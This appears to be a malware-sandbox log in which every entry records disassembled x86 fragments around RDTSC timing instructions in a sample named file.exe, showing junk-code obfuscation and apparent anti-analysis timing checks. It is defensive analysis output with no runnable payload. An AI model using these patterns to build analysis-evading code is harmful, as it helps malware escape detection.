Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3257A second address: A32599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F45B11B236Ch 0x0000000b jg 00007F45B11B2366h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F45B11B236Ah 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A327FD second address: A32819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F45B187B8D6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F45B187B8D6h 0x00000016 jns 00007F45B187B8D6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3464E second address: A34653 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A34A92 second address: A34AA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A34AA0 second address: A34AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A34D23 second address: A34D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A35432 second address: A35445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B11B236Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A35633 second address: A35637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A35F87 second address: A35FE2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b jg 00007F45B11B2366h 0x00000011 pop eax 0x00000012 pop edi 0x00000013 nop 0x00000014 push 00000000h 0x00000016 mov si, bx 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F45B11B2368h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 push ecx 0x00000036 call 00007F45B11B2377h 0x0000003b mov di, bx 0x0000003e pop edi 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A35FE2 second address: A35FE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A379F7 second address: A37A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B2375h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A37A10 second address: A37A15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A384F2 second address: A384F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A38284 second address: A3828A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A384F8 second address: A3857C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B11B2368h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F45B11B2372h 0x00000011 ja 00007F45B11B2368h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F45B11B2368h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D3104h], edx 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007F45B11B2368h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 push 00000000h 0x00000057 mov esi, 73AB6831h 0x0000005c xchg eax, ebx 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3828A second address: A382A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B187B8E0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3857C second address: A38591 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F45B11B236Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB18 second address: A3AB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB23 second address: A3AB27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB27 second address: A3AB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3AB2D second address: A3AB3C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45B11B2368h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F775C second address: 9F7768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F45B187B8D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3B10F second address: A3B114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3BC54 second address: A3BC5E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A40702 second address: A40706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A40706 second address: A4070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4070A second address: A40714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3FA64 second address: A3FA6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A409C2 second address: A409D3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B11B2368h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3FA6A second address: A3FA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A409D3 second address: A409DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A426DB second address: A426E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4188D second address: A41891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A44749 second address: A4474E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4474E second address: A44753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45910 second address: A45997 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F45B187B8DCh 0x00000008 jng 00007F45B187B8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 call 00007F45B187B8DFh 0x00000018 call 00007F45B187B8DCh 0x0000001d xor bx, C19Bh 0x00000022 pop edi 0x00000023 pop edi 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F45B187B8D8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 pushad 0x00000046 mov edi, ebx 0x00000048 mov di, cx 0x0000004b popad 0x0000004c stc 0x0000004d mov dword ptr fs:[00000000h], esp 0x00000054 mov eax, dword ptr [ebp+122D01F9h] 0x0000005a push eax 0x0000005b movsx ebx, bx 0x0000005e pop ebx 0x0000005f push FFFFFFFFh 0x00000061 mov bx, 2763h 0x00000065 push eax 0x00000066 push ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 push ebx 0x0000006a pop ebx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45997 second address: A4599B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4A88B second address: A4A894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4CD61 second address: A4CD67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A479AA second address: A479AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A499A5 second address: A499A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A489DB second address: A489E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A479AE second address: A479B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A499A9 second address: A499AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4E0DC second address: A4E0FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jc 00007F45B11B2370h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4EE40 second address: A4EEC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F45B187B8E8h 0x0000000e jns 00007F45B187B8D6h 0x00000014 popad 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 jmp 00007F45B187B8E6h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F45B187B8D8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a xchg eax, esi 0x0000003b jmp 00007F45B187B8E4h 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jg 00007F45B187B8DCh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A499AF second address: A49A52 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F45B11B236Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F45B11B2374h 0x00000010 nop 0x00000011 mov bh, 55h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr [ebp+122D1BF7h], ebx 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F45B11B2368h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov ebx, dword ptr [ebp+122D2CFBh] 0x00000047 mov eax, dword ptr [ebp+122D092Dh] 0x0000004d add bx, E6E4h 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push ecx 0x00000057 call 00007F45B11B2368h 0x0000005c pop ecx 0x0000005d mov dword ptr [esp+04h], ecx 0x00000061 add dword ptr [esp+04h], 00000016h 0x00000069 inc ecx 0x0000006a push ecx 0x0000006b ret 0x0000006c pop ecx 0x0000006d ret 0x0000006e mov ebx, dword ptr [ebp+122D2C87h] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 jne 00007F45B11B236Ch 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A49A52 second address: A49A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F45B187B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4FEA8 second address: A4FF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F45B11B2368h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jc 00007F45B11B236Bh 0x0000002a mov ebx, 44355691h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007F45B11B2368h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b or di, FC8Fh 0x00000050 xchg eax, esi 0x00000051 jbe 00007F45B11B2374h 0x00000057 push eax 0x00000058 push edx 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A56677 second address: A5667C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5667C second address: A56689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A56689 second address: A566A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B187B8E2h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A59632 second address: A59644 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F45B11B2366h 0x00000009 pop esi 0x0000000a jl 00007F45B11B236Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5DCE9 second address: A5DD1B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jmp 00007F45B187B8E0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45B187B8E2h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5DD1B second address: A5DD39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jo 00007F45B11B2374h 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A5DD39 second address: A5DD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6470B second address: A6470F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6470F second address: A64713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64713 second address: A64719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64719 second address: A64746 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F45B187B8D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnl 00007F45B187B8D6h 0x00000015 jmp 00007F45B187B8E3h 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A63B32 second address: A63B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A63EA8 second address: A63EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A63EB6 second address: A63EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F45B11B2366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F45B11B237Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A63EDD second address: A63EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F45B187B8D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A63EE7 second address: A63EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6402B second address: A64037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45B187B8D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A64037 second address: A6403F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6403F second address: A6405B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F45B187B8E5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6405B second address: A6405F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6405F second address: A64065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A641D2 second address: A641DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A645D7 second address: A645E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A689E0 second address: A689F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F45B11B236Bh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A689F0 second address: A689F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A689F5 second address: A689FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A689FE second address: A68A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A68A02 second address: A68A1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F45B11B2370h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A679C1 second address: A679C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A679C6 second address: A679D0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F45B11B236Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D890 second address: A3D8BB instructions: 0x00000000 rdtsc 0x00000002 js 00007F45B187B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F45B187B8DCh 0x00000010 popad 0x00000011 nop 0x00000012 xor cl, FFFFFFD5h 0x00000015 lea eax, dword ptr [ebp+1248C5B5h] 0x0000001b sbb dx, 07A5h 0x00000020 nop 0x00000021 push eax 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D8BB second address: A3D8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D8C7 second address: A3D8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3D8CB second address: A1D539 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 jmp 00007F45B11B2370h 0x0000000d call dword ptr [ebp+122D3571h] 0x00000013 push ebx 0x00000014 je 00007F45B11B2372h 0x0000001a jnl 00007F45B11B2366h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF18 second address: A3DF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A3DF1E second address: A3DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
